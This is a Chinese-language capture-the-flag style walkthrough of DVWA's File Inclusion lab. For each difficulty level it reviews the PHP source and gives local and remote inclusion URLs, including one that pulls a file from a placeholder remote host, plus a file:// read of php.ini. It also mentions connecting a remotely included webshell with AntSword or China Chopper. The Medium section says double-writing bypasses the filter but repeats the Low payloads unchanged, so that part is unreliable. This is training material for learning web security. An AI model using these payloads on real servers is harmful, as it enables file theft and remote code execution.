DVWA-File Inclusion通关教程-完结
文章目录
- [DVWA-File Inclusion通关教程-完结](#DVWA-File Inclusion通关教程-完结)
页面功能
点击页面上提供的三个页面,单击这些文件就会显示其执行内容,同时发现提交是由GET方式进行,使用page参数传参。
Low
源码审计
<?php
// The page we wish to display
$file = $_GET[ 'page' ];
?>源码很简单,用 GET 方法接收文件路径,然后将其包含进来。服务器包含文件时,无论文件是否是 PHP 文件,都会尝试当做 PHP 文件来执行。如果文件内容确实是 PHP 文件,则会正常执行并返回结果,如果不是则会将文件内容回显到网页中,所以文件包含漏洞常常会导致任意文件读取与任意命令执行。
漏洞利用
page 参数指的是文件路径,因此我们先传个不存在的文件名测试一下,看看有没有报错信息。传递page参数为 1.php,靶场报错并返回了文件所在的路径。
因此我们直接用相对路径,访问上两级文件夹下的 phpinfo.php 文件,构造出 payload。
如果远程包含一个一句话木马文件,则可以使用蚁剑或中国菜刀进行连接。
?page=..\..\phpinfo.php //本地文件包含
?page=http://ip//aaa/a.php //远程文件包含
Medium
源码审计
<?php
// The page we wish to display
$file = $_GET[ 'page' ];
// Input validation
$file = str_replace( array( "http://", "https://" ), "", $file );
$file = str_replace( array( "../", "..\"" ), "", $file );
?>代码增加了 str_replace 函数对 page 参数进行了过滤。将 "http://"、"https://"替换为空阻止远程包含漏洞,将".../"、"...\" 替换为空阻止用相对路径访问文件。
漏洞利用
代码使用 str_replace函数 对http:// 和 https:// 进行了过滤,防止了远程包含漏洞的产生,同时也过滤了 .../ 和 ...\ 防止攻击者进行目录切换。
但是使用 str_replace 函数进行过滤是很不安全的,因为可以使用双写绕过。
?page=..\..\phpinfo.php //本地文件包含
?page=http://ip//aaa/a.php //远程文件包含
High
源码审计
代码中使用了fnmatch()函数检查page参数,要求page参数的开头必须是file,服务器才会去包含相应的文件。
利用该特点,在Windows平台下可以使用file协议绕过防护策略
注意:fnmatch 函数适用于 PHP >= 4.3.0,因此 php 版本高于这个才能利用
<?php
// The page we wish to display
$file = $_GET[ 'page' ];
// Input validation
if( !fnmatch( "file*", $file ) && $file != "include.php" ) {
// This isn't the page we want!
echo "ERROR: File not found!";
exit;
}
?>漏洞利用
以此可以构造url,进行读取服务器的配置文件
?page=file://E:/phpStudy/WWW/DVWA/php.ini
Impossible
源码审计
代码使用了白名单机制防御文件包含漏洞,如果不是代码中的这些文件名,则一律进行报错显示。
<?php
// The page we wish to display
$file = $_GET[ 'page' ];
// Only allow include.php or file{1..3}.php
if( $file != "include.php" && $file != "file1.php" && $file != "file2.php" && $file != "file3.php" ) {
// This isn't the page we want!
echo "ERROR: File not found!";
exit;
}
?>